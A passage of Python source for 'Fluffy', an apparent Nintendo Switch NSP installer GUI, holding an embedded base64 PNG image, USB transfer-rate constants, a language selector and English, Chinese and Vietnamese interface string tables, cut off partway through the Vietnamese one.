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'
DONUT_DATA = DARK_DONUT_DATA
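# USB chunk sizes for Tinfoil transfers: Safe mode writes 0x1F4 (500) bytes at a
# time for flaky cables, Normal mode writes 0x100000 (1 MiB) per USB write.
# set_transfer_rate() picks one via TransferRateDict when a transfer starts.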
class TransferRates:
Safe = 0x1F4
Normal = 0x100000
TransferRateDict = {0: TransferRates.Safe,
1: TransferRates.Normal}
# "Language!" -Cap, May 1st 2015
def set_language(v):
global language
language = v
if v == 0:
Language.CurrentDict = Language.EnglishDict
elif v == 1:
Language.CurrentDict = Language.ChineseDict
elif v == 2:
Language.CurrentDict = Language.VietDict
elif v == 3:
Language.CurrentDict = Language.TurkishDict
elif v == 4:
Language.CurrentDict = Language.BrazilianDict
elif v == 5:
Language.CurrentDict = Language.ItalianDict
elif v == 6:
Language.CurrentDict = Language.FrenchDict
elif v == 7:
Language.CurrentDict = Language.SpanishDict
elif v == 8:
Language.CurrentDict = Language.GermanDict
elif v == 9:
Language.CurrentDict = Language.IndonesiaDict
elif v == 10:
Language.CurrentDict = Language.KoreanDict
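# Language.CurrentDict is swapped wholesale by set_language(); every dict below
# maps the same integer keys (0-32) to one locale's UI strings.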
class Language:
CurrentDict = None
EnglishDict = {0: "Fluffy",
1: "Begin Transfer",
2: "Switch IP",
3: "This Computer's IP",
4: "USB Transfer Mode",
5: "Normal Mode",
6: "Safe Mode",
7: "Current NSP",
8: "Successfully Installed",
9: "Awaiting Selection",
10: "Switch Not Detected",
11: "Switch Detected",
12: "Network Mode",
13: "NSP Selection",
14: "NSP(s) Selected",
15: "Awaiting Connection Request",
16: "Cancel",
17: "Error: Goldleaf threw an exception.",
18: "Error: Tinfoil threw an exception.",
19: "Error: Network threw an exception.",
20: "Dark Mode",
21: "Options",
22: "Language",
23: "Github",
24: "Network",
25: "Headers Sent",
26: "NSP(s) in Queue",
27: "Installing",
28: "Transfer Rate",
29: "Current NCA",
30: "About",
31: "Special Thanks",
32: "Donate",
}
ChineseDict = {0: "Fluffy 卷卷安装器",
1: "开始传输",
2: "Switch的IP地址",
3: "此电脑的IP地址",
4: "USB传输模式",
5: "正常模式",
6: "安全模式",
7: "当前的NSP游戏文件",
8: "成功安装",
9: "等待选择",
10: "Switch没有连接",
11: "Switch已连接",
12: "网络模式",
13: "选择NSP游戏文件",
14: "个NSP游戏文件 已选择",
15: "等待连接",
16: "取消",
17: "错误: Goldleaf 反馈了一个异常.",
18: "错误: Tinfoil 反馈了一个异常.",
19: "错误: 网络状态 反馈了一个异常.",
20: "黑暗模式",
21: "选项",
22: "语言切换",
23: "Github主页地址",
24: "网络",
25: "发送NSP头文件",
26: "个NSP游戏文件 在队列中",
27: "NSP游戏文件 安装中",
28: "传输速率",
29: "当前的NCA游戏文件包",
30: "学分",
31: "谢谢",
32: "捐赠给我",
}
VietDict = { 0: "Fluffy",
1: "Bắt Đầu Chuyển",
2: "IP Của Switch",
3: "IP Của Máy Vi Tính",
4: "Tốc Độ USB",
5: "Tốc Độ Bình Thường",
6: "Tốc Độ Chậm",
7: "Đang Chuyển NSP",
8: "Tải Xông",
9: "Hãy Chọn NSP Của Bạn",
10: "Không Thể Tìm Thấy Switch Của Bạn",
11: "Tìm Được Switch Của Bạn",
